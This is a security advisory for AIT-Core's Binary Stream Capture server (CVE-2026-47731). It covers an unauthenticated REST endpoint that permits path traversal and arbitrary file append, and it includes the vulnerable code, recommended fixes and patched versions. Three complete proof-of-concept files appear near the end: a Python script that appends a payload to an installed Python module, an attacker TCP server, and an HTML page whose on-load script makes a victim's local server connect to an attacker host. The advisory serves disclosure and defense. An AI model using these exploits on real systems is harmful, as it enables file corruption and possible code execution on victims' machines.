PT-2026-47089 · Pypi · Ait-Core

Published 2026-06-05 · Updated 2026-06-05 · CVE-2026-47731

CVSS v3.1: 9.1 (Critical)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

1. Summary

The Binary Stream Capture (BSC) component exposes an unauthenticated HTTP API for dynamically creating packet capture “handlers.” Because the code blindly trusts path‑related form fields, a remote client can:
  • Bypass the configured log root and direct BSC to log to arbitrary filesystem paths (path traversal / directory escape), and
  • Append attacker-controlled data to those files, using the privileges of the ait-bsc process.
There are two ways for a remote attacker to trigger this:
  1. With network access to the ait-bsc host (for example, because its ports are publicly reachable), the attacker sends the payloads directly to the server to trigger the arbitrary file append. This attack is demonstrated in python_poc.py.
  2. Without direct network access (for example, because the software runs on a local network), the attack still works if a user on that network opens an attacker-controlled website, either one created by the attacker or a third-party site the attacker has compromised. JavaScript in the browser can automatically send the required requests into the local network, even when the server is reachable only on localhost. This attack is demonstrated by attacker_tcp.py and test1.html: first launch the attacker TCP server, then host test1.html with a web server (for example, python3 -m http.server 7000) and open test1.html.

Impact

This issue affects BSC (Binary Stream Capture) and any use of the ait-bsc server. It impacts AIT-Core versions before 3.1.1, and 2.x versions before 2.6.1. Users should upgrade to version 3.1.1 or 2.6.1.

Details

A remote attacker can use this vulnerability to append data to arbitrary files on the system, provided the ait-bsc process has permission to write to them. This makes it easy to corrupt data, including the AIT-Core Python code itself, so that the server crashes when it is restarted and Python attempts to execute the corrupted code. There also appears to be a bug in the TCP handler that writes large amounts of data in an infinite loop after the connection has been closed, which could lead to excessive disk usage. Because the attacker can modify executable files such as Python or bash scripts, the vulnerability could also lead to remote code execution as soon as a user runs the modified code. Depending on the system, however, this may be difficult or impossible in practice, because ait-bsc writes a header in front of the attacker-controlled data.

Fix Information

The vulnerability is mitigated by constraining BSC to write only within the root log directory configured in bsc.yaml. Additionally, any attempt to traverse outside the configured location is rejected.

Patches

  • 3.1.1
  • 2.6.1

2. Affected Code Paths

2.1 REST entry point: /NAME/start

StreamCaptureManagerServer exposes an unauthenticated POST endpoint:
# ait/core/bsc.py

class StreamCaptureManagerServer(Bottle):
  def route(self):
    self._app.route("/", method="GET", callback=self._get_logger_list)
    self._app.route("/stats", method="GET", callback=self._fetch_handler_stats)
    self._app.route(
      "/<name>/start", method="POST", callback=self._add_logger_by_name
    )
    self._app.route(
      "/<name>/stop", method="DELETE", callback=self._stop_logger_by_name
    )
    ...
Handler:
def _add_logger_by_name(self, name):
  ...
  data = dict(request.forms)
  loc = data.pop("loc", "")
  port = data.pop("port", None)
  conn_type = data.pop("conn_type", None)

  if not port or not conn_type:
    raise ValueError("Port and/or conn_type not set")

  address = [loc, int(port)]

  if "rotate_log" in data:
    data["rotate_log"] = True if data == "true" else False

  if "rotate_log_delta" in data:
    data["rotate_log_delta"] = int(data["rotate_log_delta"])

  self._logger_manager.add_logger(name, address, conn_type, **data)
All form fields except loc, port, and conn_type are passed directly as **data into add_logger. This includes the attacker-controlled path, file_name_pattern, and potentially log_dir_path. There is no authentication on this route.

2.2 Manager: unvalidated path and log_dir_path

StreamCaptureManager.add_logger:
# ait/core/bsc.py

def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
  capture_handler_conf = kwargs

  if not log_dir_path:
    log_dir_path = self._mngr_conf["root_log_directory"]

  log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))

  capture_handler_conf["log_dir"] = log_dir_path
  capture_handler_conf["name"] = name
  if "rotate_log" not in capture_handler_conf:
    capture_handler_conf["rotate_log"] = True

  ...
  address_key = str(address)
  if address_key in self._stream_capturers:
    capturer = self._stream_capturers[address_key][0]
    capturer.add_handler(capture_handler_conf)
    return

  socket_logger = SocketStreamCapturer(capture_handler_conf, address, conn_type)
  greenlet = gevent.spawn(socket_logger.socket_monitor_loop)
  self._stream_capturers[address_key] = (socket_logger, greenlet)
  self._pool.add(greenlet)
Key points:
  • If the REST client supplies log_dir_path explicitly (as a named parameter), it overrides the manager's root_log_directory.
  • All other attacker-supplied fields in kwargs become part of the handler configuration dict (capture_handler_conf), including path and file_name_pattern.
  • There is no check that log_dir_path or path are relative or confined.
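The data flow described in the key points can be reproduced with a simplified stand-in. This is only a sketch: add_logger_sketch and the form values are hypothetical and merely mirror the signature shape quoted above; it is not the AIT-Core implementation.

```python
def add_logger_sketch(name, address, conn_type, log_dir_path=None, **kwargs):
    """Hypothetical stand-in that mirrors the signature shape of add_logger."""
    root = "/configured/root"  # stands in for root_log_directory (assumed value)
    conf = dict(kwargs)
    # A client-supplied log_dir_path wins over the configured root.
    conf["log_dir"] = log_dir_path or root
    conf["name"] = name
    return conf


# Form fields as a client might send them (illustrative values only).
form = {
    "loc": "",
    "port": "9999",
    "conn_type": "udp",
    "log_dir_path": "/etc",
    "path": "../../somewhere",
    "file_name_pattern": "target.txt",
}

# Same pop-then-splat pattern as the REST handler.
data = dict(form)
loc = data.pop("loc", "")
port = data.pop("port", None)
conn_type = data.pop("conn_type", None)

conf = add_logger_sketch("demo", [loc, int(port)], conn_type, **data)
print(conf)
```

Because log_dir_path is a named parameter, it is bound directly from the form data, while path and file_name_pattern travel through **kwargs into the handler configuration untouched.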

2.3 Path traversal via _get_log_file

SocketStreamCapturer._get_log_file builds the actual log path:
# ait/core/bsc.py

def _get_log_file(self, handler):
  """Generate log file path for a given handler"""
  if "file_name_pattern" not in handler:
    filename = "%Y-%m-%d-%H-%M-%S-{name}.pcap"
  else:
    filename = handler["file_name_pattern"]

  log_file = handler["log_dir"]
  if "path" in handler:
    log_file = os.path.join(log_file, handler["path"], filename)
  else:
    log_file = os.path.join(log_file, filename)

  log_file = time.strftime(log_file, time.gmtime())
  log_file = log_file.format(**handler)

  return log_file
On POSIX systems:
  • If handler["path"] is absolute (e.g. /home/user/...), os.path.join(base, abs_component, ...) discards the base component:
os.path.join("/configured/root", "/home/elias/ait-venv/...", "dmc.py")
# -> "/home/elias/ait-venv/.../dmc.py"
  • If handler["path"] contains .., the result can point outside the nominal root even if path is relative.
There is:
  • No os.path.realpath canonicalization after join, and
  • No enforcement that the final log_file begins with the configured root prefix.
Combined with StreamCaptureManager.add_logger, this means the attacker controls both:
  • handler["log_dir"] (via log_dir_path), and
  • handler["path"] and handler["file_name_pattern"].
They can therefore direct BSC's log output to any path that the OS permissions allow, not just under root_log_directory.
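Both escape routes can be checked in isolation. The sketch below uses posixpath so that it behaves the same on any platform; the directory names are illustrative and not taken from a real deployment.

```python
import posixpath

root = "/configured/root"

# An absolute component discards everything that precedes it.
absolute = posixpath.join(root, "/home/user/project", "dmc.py")

# A relative component containing ".." escapes once the path is normalized.
relative = posixpath.normpath(posixpath.join(root, "../../etc", "target.conf"))

print(absolute)  # /home/user/project/dmc.py
print(relative)  # /etc/target.conf
```

In neither case does the resulting path start with the configured root, which is why a check on the final, canonicalized path is needed rather than a check on the individual inputs.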

2.4 File opened for append without safety checks

# ait/core/bsc.py

def _get_logger(self, handler):
  """Initialize a PCAP stream for logging data"""
  log_file = self._get_log_file(handler)

  if not os.path.isdir(os.path.dirname(log_file)):
    os.makedirs(os.path.dirname(log_file))

  handler["log_rot_time"] = time.gmtime()
  return pcap.open(log_file, mode="a")
pcap.open:
# ait/core/pcap.py

def open(filename, mode="r", **options):
  ...
  mode = mode.replace("b", "") + "b" # "a" -> "ab"
  ...
  stream = PCapStream(builtins.open(filename, mode), mode)
  return stream
Consequences:
  • If the target directory does not exist, os.makedirs(os.path.dirname(log_file)) will create it, even if it is outside the intended root.
  • The file is opened in append-binary mode ("ab"):
    • The OS will create it if missing.
    • Existing content is preserved; new data is appended.
  • There is no:
    • realpath-based confinement,
    • symlink protection,
    • or additional access control beyond standard filesystem permissions.
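The create-then-append behavior listed above is plain standard-library behavior and can be observed without AIT-Core. The following sketch works in a temporary directory; the file and directory names are arbitrary.

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as base:
    # A nested location that does not exist yet.
    target = os.path.join(base, "not", "yet", "there", "file.bin")

    # makedirs creates the whole missing directory chain.
    os.makedirs(os.path.dirname(target))

    # "ab" creates the file if it is missing.
    with open(target, "ab") as fh:
        fh.write(b"original")

    # A second open in "ab" keeps the existing bytes and appends.
    with open(target, "ab") as fh:
        fh.write(b"+appended")

    with open(target, "rb") as fh:
        content = fh.read()

print(content)  # b'original+appended'
```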

2.5 A part of the data written is attacker‑controlled network payload

Captured data path:
# ait/core/bsc.py

def capture_packet(self):
  """Write packet data to the logger's log file."""
  data = self.socket.recv(self._buffer_size)

  for h in self.capture_handlers:
    h["reads"] += 1
    h["data_read"] += len(data)

    d = data
    if "pre_write_transforms" in h:
      for data_transform in h["pre_write_transforms"]:
        d = data_transform(d)
    h["logger"].write(d)
SocketStreamCapturer.__init__:
  • UDP:
if conn_type == "udp":
  self.socket = gevent.socket.socket(AF_INET, SOCK_DGRAM)
  self.socket.bind((address[0], address[1]))
  • TCP:
elif conn_type == "tcp":
  self.socket = gevent.socket.socket(AF_INET, SOCK_STREAM)
  self.socket.connect((address[0], address[1]))
Thus:
  • For UDP, any host that can send datagrams to the configured (IP, port) directly controls data.
  • For TCP, the remote server at (loc, port) directly controls data.
PCapStream.write wraps this data in a PCAP packet header and writes it to the file, but does not sanitize or transform the payload bytes beyond optional in-process transforms.
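To illustrate what "header plus payload" looks like on disk, here is a minimal sketch that assumes the standard libpcap per-record layout (ts_sec, ts_usec, incl_len, orig_len as four little-endian 32-bit integers). Whether AIT-Core's PCapPacketHeader matches this layout exactly is an assumption; the PoC below only relies on ts_sec being written first. The helper pcap_record and the timestamp value are hypothetical.

```python
import struct


def pcap_record(ts_sec, ts_usec, payload):
    """Build one record in the assumed libpcap layout: 16-byte header + payload."""
    header = struct.pack("<IIII", ts_sec, ts_usec, len(payload), len(payload))
    return header + payload


payload = b"ATTACK PAYLOAD"

# Illustrative timestamp whose low byte is 0x00.
record = pcap_record(0x6A000100, 0, payload)

print(record[:16].hex(" "))
print(record[16:])
```

The payload bytes appear verbatim after the 16 header bytes. The header itself is not attacker-chosen, which is why the PoC times its datagram so that the first header byte (the low byte of ts_sec) is 0x00.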

3. Recommendations

The core objective is to ensure that untrusted REST input cannot steer log file paths outside a trusted directory tree.

3.1 Constrain log paths to a trusted root

  • In StreamCaptureManager.add_logger and/or SocketStreamCapturer._get_log_file:
  1. Compute a canonical root:
root = os.path.realpath(self._mngr_conf["root_log_directory"])
  2. When applying path and file_name_pattern, always join relative to this root; do not accept an absolute path from REST:
user_path = handler.get("path", "")
# force relative
user_path = user_path.lstrip(os.sep)
candidate = os.path.realpath(os.path.join(root, user_path, filename))
  3. Enforce the prefix:
if not (candidate == root or candidate.startswith(root + os.sep)):
  raise ValueError("Invalid log path; must remain under root log directory")
  • Reject any REST-supplied log_dir_path that is absolute or attempts to escape the configured root, or disallow log_dir_path entirely in REST calls.
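The three steps above can be combined into a single helper. This is a sketch under stated assumptions, not the patch shipped in 3.1.1 or 2.6.1: resolve_log_path is a hypothetical name, and os.path.commonpath is used here in place of the string-prefix test as an equivalent confinement check.

```python
import os
import tempfile


def resolve_log_path(root, user_path, filename):
    """Return a canonical path under root, or raise ValueError (hypothetical helper)."""
    root = os.path.realpath(root)
    # Force the user-supplied directory to be relative, then canonicalize.
    candidate = os.path.realpath(
        os.path.join(root, user_path.lstrip(os.sep), filename)
    )
    # The check runs on the final path, so an absolute or ".."-laden
    # filename is caught as well.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("Invalid log path; must remain under root log directory")
    return candidate


demo_root = tempfile.mkdtemp()
print(resolve_log_path(demo_root, "handlers/udp", "capture.pcap"))

try:
    resolve_log_path(demo_root, "../..", "escaped.txt")
except ValueError as exc:
    print("rejected:", exc)
```

Checking the canonicalized result rather than each input means that symlinks already present inside the root are resolved before the comparison. It does not protect against a symlink created between the check and the open call.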

3.2 Treat REST input as untrusted

  • Only allow path / file_name_pattern overrides from the configuration file (bsc.yaml), not from REST.
  • For REST-created handlers, either:
    • Use a fixed subdirectory under the configured root, or
    • Validate path strictly as a simple relative name with no / or .. components.
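A strict validation of this kind could look like the sketch below. The function name is_simple_name and the exact allowed character set are assumptions chosen for illustration; a deployment may want a narrower or wider set.

```python
import re

# One path component: starts with an alphanumeric, then letters, digits,
# dot, underscore or hyphen. No separators are permitted.
_SIMPLE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def is_simple_name(value):
    """True only for a single path component without separators or '..'."""
    return bool(_SIMPLE_NAME.fullmatch(value)) and ".." not in value


for sample in ["udp-logs", "../etc", "/abs", "a/b", "..", ""]:
    print(repr(sample), is_simple_name(sample))
```

The rule is deliberately conservative: it also rejects harmless names such as "a..b", trading a little flexibility for a check that is easy to reason about.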

3.3 Note on /tmp usage

  • While not the root cause of this vulnerability, using a world‑writable directory such as /tmp as a log root in a multi‑user system is generally unsafe (standard symlink and race issues).
  • It is recommended to:
  • Use a dedicated, non‑world‑writable directory for BSC logs (e.g. /var/opt/ait-bsc/logs).
  • Update the documentation examples to reflect this and add a warning against /tmp for production use.

3.4 Harden open calls

  • If symlink attacks are a concern in specific deployments, consider refusing to follow symlinks when opening log files for writing.
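On POSIX systems, one way to do this is to open the file with O_NOFOLLOW. The sketch below is an illustration, not part of AIT-Core: open_append_nofollow is a hypothetical helper and the 0o640 mode is an assumed default. Note that O_NOFOLLOW only covers the final path component; symlinked parent directories are still followed.

```python
import os
import tempfile


def open_append_nofollow(path):
    """Open path for binary append, refusing a symlink as the final component."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o640)
    return os.fdopen(fd, "ab")


with tempfile.TemporaryDirectory() as d:
    real = os.path.join(d, "capture.pcap")
    link = os.path.join(d, "link.pcap")

    # A regular file is created and written as usual.
    with open_append_nofollow(real) as fh:
        fh.write(b"data")

    # Opening through a symlink fails with OSError.
    os.symlink(real, link)
    try:
        open_append_nofollow(link).close()
        refused = False
    except OSError:
        refused = True

print(refused)
```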

3.5 REST API exposure

  • Because /NAME/start directly controls file paths and network connections:
  • It should not be exposed to untrusted networks.
  • Consider adding optional HTTP authentication or limiting binding to a protected interface or Unix domain socket.

4. Proof of concept files

4.1 python_poc.py

#!/usr/bin/env python3
"""
AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header).

Assumptions:
- ait-core and requests are installed.
- ait-bsc is running on 127.0.0.1:8080 with a bsc.yaml including:

  capture_manager:
   root_log_directory: /tmp
   manager_server:
    host: localhost
    port: 8080
  handlers: []

What this script does:
1) Uses the BSC REST API to create a conn_type=udp handler that:
   - binds a UDP socket on UDP_PORT, and
   - logs to TARGET_PATH, which is OUTSIDE /tmp via 'path'.
2) Waits until the current UNIX time satisfies (ts_sec & 0xFF) == 0
  (low byte of ts_sec == 0) and sends a UDP PAYLOAD right then.
  On little-endian, this makes the FIRST BYTE of the PCAP packet header
  (ts_sec low byte) 0x00 with high probability.
3) Shows that TARGET_PATH (outside /tmp) exists and contains the payload.
4) DELETEs the handler so you can rerun the script without restarting ait-bsc.

Note:
- The script does NOT delete or truncate TARGET_PATH.
- If TARGET_PATH already exists, ait-bsc will append a new PCAP packet
 (header + payload) at the end of the file.
"""

import os
import socket
import time

import requests

# BSC REST API base URL
BSC_BASE_URL = "http://127.0.0.1:8080"

# UDP capture parameters
UDP_PORT = 9999
HANDLER_NAME = "traversal-udp-poc-timed"
CONN_TYPE = "udp"

# Target directory and file OUTSIDE /tmp
HOME = os.path.expanduser("~")
TARGET_DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/"
TARGET_FILE = "dmc.py"
TARGET_PATH = os.path.join(TARGET_DIR, TARGET_FILE)

# Payload to be sent in the UDP datagram
PAYLOAD = b"ATTACK PAYLOAD UDP TIMED 12345"


def wait_for_first_header_byte_zero():
  """
  Wait until the low byte of the current UNIX seconds is 0.

  PCapPacketHeader.pack() writes ts_sec first, and on little-endian systems
  the first byte in the file is ts_sec & 0xFF. We wait for ts_sec % 256 == 0
  and for the fractional part of the second to be small.
  """
  print("[*] Waiting for ts_sec & 0xFF == 0 (may take up to ~4m16s)...")
  while True:
    now = time.time()
    ts_sec = int(now)
    # Condition: low byte zero and we are in the first 200ms of this second
    if (ts_sec & 0xFF) == 0 and (now - ts_sec) < 0.2:
      print(f"[+] Condition met: ts_sec={ts_sec}, low byte=0x00")
      return
    time.sleep(0.01)


def create_udp_handler():
  """
  Use BSC REST API to create a UDP handler that binds on UDP_PORT and
  logs to TARGET_PATH, which is outside /tmp via the 'path' parameter.
  """
  data = {
    "loc": "",               # bind on all interfaces
    "port": str(UDP_PORT),
    "conn_type": CONN_TYPE,
    "path": TARGET_DIR,      # ABSOLUTE path outside /tmp
    "file_name_pattern": TARGET_FILE,
  }
  url = f"{BSC_BASE_URL}/{HANDLER_NAME}/start"
  print(f"[+] Creating UDP handler via POST {url}")
  resp = requests.post(url, data=data)
  print(f"[+] Handler creation HTTP status: {resp.status_code}")
  if not (200 <= resp.status_code < 300):
    raise SystemExit(f"Handler creation failed: {resp.status_code} {resp.text!r}")


def send_udp_payload_timed():
  """
  Wait for the desired timestamp condition, then send the UDP payload
  to the handler's bound UDP port.
  """
  wait_for_first_header_byte_zero()
  print(f"[+] Sending timed UDP payload to 127.0.0.1:{UDP_PORT}")
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  try:
    sock.sendto(PAYLOAD, ("127.0.0.1", UDP_PORT))
  finally:
    sock.close()
  # Give ait-bsc a moment to recv and write
  time.sleep(0.5)


def stop_udp_handler():
  """
  Stop the handler so the script can be rerun without restarting ait-bsc.
  """
  url = f"{BSC_BASE_URL}/{HANDLER_NAME}/stop"
  try:
    resp = requests.delete(url, timeout=2)
    print(f"[+] DELETE {url} -> HTTP {resp.status_code}")
  except Exception as e:
    print(f"[!] Failed to DELETE handler: {e!r}")


def show_result():
  """
  Display hex+ASCII view of the first bytes of TARGET_PATH.
  """
  if not os.path.exists(TARGET_PATH):
    print(f"[!] Target file does not exist: {TARGET_PATH}")
    print("  ait-bsc did not create/write the file; check config and that ait-bsc is running.")
    return

  print(f"[+] Target file was created or appended by ait-bsc: {TARGET_PATH}")
  # Read the whole file; close the handle deterministically.
  with open(TARGET_PATH, "rb") as fh:
    data = fh.read()
  print(f"[+] Target file size: {len(data)} bytes")

  def chunked(seq, size):
    for i in range(0, len(seq), size):
      yield i, seq[i : i + size]

  print("[+] First bytes of file (hex + ASCII):")
  for offset, chunk in chunked(data, 16):
    hex_bytes = " ".join(f"{b:02x}" for b in chunk)
    ascii_bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    print(f"{offset:08x} {hex_bytes:<47} |{ascii_bytes}|")
    if offset >= 96:
      break

  if PAYLOAD in data:
    print("[+] CONFIRMED: payload bytes are present in the file.")
  else:
    print("[!] Payload bytes not found (something went wrong).")


def main():
  print("[*] AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header)")
  print(f"[*] BSC base URL : {BSC_BASE_URL}")
  print(f"[*] UDP port     : {UDP_PORT}")
  print(f"[*] TARGET_DIR   : {TARGET_DIR}")
  print(f"[*] TARGET_FILE  : {TARGET_FILE}")
  print(f"[*] FULL PATH    : {TARGET_PATH}")
  print()

  # We deliberately do NOT create TARGET_DIR or TARGET_PATH here.
  # ait-bsc will create the directory and file when it opens the log path.
  create_udp_handler()
  send_udp_payload_timed()
  show_result()
  stop_udp_handler()

  print()
  print("[*] If you see your PAYLOAD bytes in TARGET_PATH (which is not under /tmp),")
  print("[*] then BSC has written outside its configured root_log_directory via REST 'path' using UDP.")
  print("[*] The script also timed the send so the first packet header byte (ts_sec low byte) is likely 0x00.")


if __name__ == "__main__":
  main()

4.2 attacker_tcp.py

#!/usr/bin/env python3
import socket

HOST = "0.0.0.0"  # attacker host interface
PORT = 9001       # must match 'port' you send to ait-bsc
PAYLOAD = b"ATTACK PAYLOAD FROM ATTACKER 12345\n"

def main():
  print(f"[*] Attacker TCP server listening on {HOST}:{PORT}")
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(1)

    print("[*] Waiting for connection from ait-bsc...")
    bsc_sock, bsc_addr = srv.accept()
    print(f"[+] Got connection from ait-bsc at {bsc_addr}")

    with bsc_sock:
      print("[+] Sending payload to ait-bsc...")
      bsc_sock.sendall(PAYLOAD)
      print("[+] Payload sent, closing connection")

  print("[*] Done.")

if __name__ == "__main__":
  main()

4.3 test1.html

<!DOCTYPE html>
<html>
<head>
 <meta charset="utf-8">
 <title>AIT-BSC Path Traversal PoC (Browser + TCP)</title>
</head>
<body>
<script>
(function () {
 // AIT-BSC REST API on the victim
 const BSC_URL   = "http://127.0.0.1:8080";
 const HANDLER_NAME = "traversal-tcp-from-browser";

 // Attacker TCP server (remote)
 const ATTACKER_HOST = "192.168.1.184"; // change to real host/IP
 const ATTACKER_PORT = 9001;          // must match Python server

 // Target file on the victim (outside /tmp)
 const TARGET_DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/";
 const TARGET_FILE = "dmc.py";

 function startHandler() {
  // Tell ait-bsc to:
  // - connect via TCP to ATTACKER_HOST:ATTACKER_PORT
  // - log to TARGET_DIR/TARGET_FILE (escape /tmp via 'path')
  const params = new URLSearchParams();
  params.set("loc", ATTACKER_HOST);
  params.set("port", String(ATTACKER_PORT));
  params.set("conn_type", "tcp");
  params.set("path", TARGET_DIR);
  params.set("file_name_pattern", TARGET_FILE);

  fetch(`${BSC_URL}/${HANDLER_NAME}/start`, {
   method: "POST",
   headers: {
    "Content-Type": "application/x-www-form-urlencoded"
   },
   body: params.toString(),
   mode: "no-cors" // we don't care about reading the response
  }).catch(() => {});
 }

 // On page load, just start the handler. The attacker TCP server
 // will send the payload as soon as ait-bsc connects.
 window.addEventListener("load", startHandler);
})();
</script>
</body>
</html>

Fix

Path traversal

Weakness Enumeration

Related Identifiers

CVE-2026-47731
GHSA-P462-PRXW-MJX4

Affected Products

Ait-Core